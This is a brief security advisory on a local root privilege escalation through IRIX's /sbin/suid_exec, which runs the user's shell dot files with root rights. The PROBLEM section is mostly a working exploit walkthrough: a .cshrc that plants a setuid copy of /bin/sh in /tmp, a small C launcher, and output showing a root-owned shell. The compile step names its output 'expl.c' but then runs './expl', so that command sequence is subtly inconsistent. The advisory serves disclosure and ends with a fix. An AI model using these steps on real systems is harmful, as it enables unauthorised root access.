COMMAND

    /sbin/suid_exec

SYSTEMS AFFECTED

    IRIX 5.x.x, 6.0.x, 6.1, 6.2, 6.3, 6.4

PROBLEM

    By default  all suid  executable files  on Irix  are ELF binaries,
    and when shell tries to parse  such a file all you get  is errors,
    but. Suid_exec  gets shell  name from  SHELL environment variable.
    Besides, it doesn't care what this  shell may do, and it may  do a
    lot of interesting  things, like executing  dot files.   There are
    many ways to exploit it, to my taste the easiest is

        % setenv | grep SHELL
        SHELL=/bin/tcsh
        % mv ~/.cshrc ~/.cshrc.old
        % cat > ~/.cshrc
        cp /bin/sh /tmp
        chmod a+rsx /tmp/sh
        ^D
        % cat > expl.c
        main()
        {
          execl("/sbin/suid_exec","/bin/su","/bin/su",0);
        }
        ^D
         % cc expl.c -o expl.c
         % ./expl
         Too many ('s.
         % ls -l /tmp/sh
         -r-sr-sr-x    1 root     sys       140784 Dec  2 19:21 /tmp/sh*

SOLUTION

    chmod -s /sbin/suid_exec (unless you  need ksh to execute suid  sh
    scripts).  The suid_exec  program is considered freeware  and will
    not be patched.  Freeware upgrades should be applied.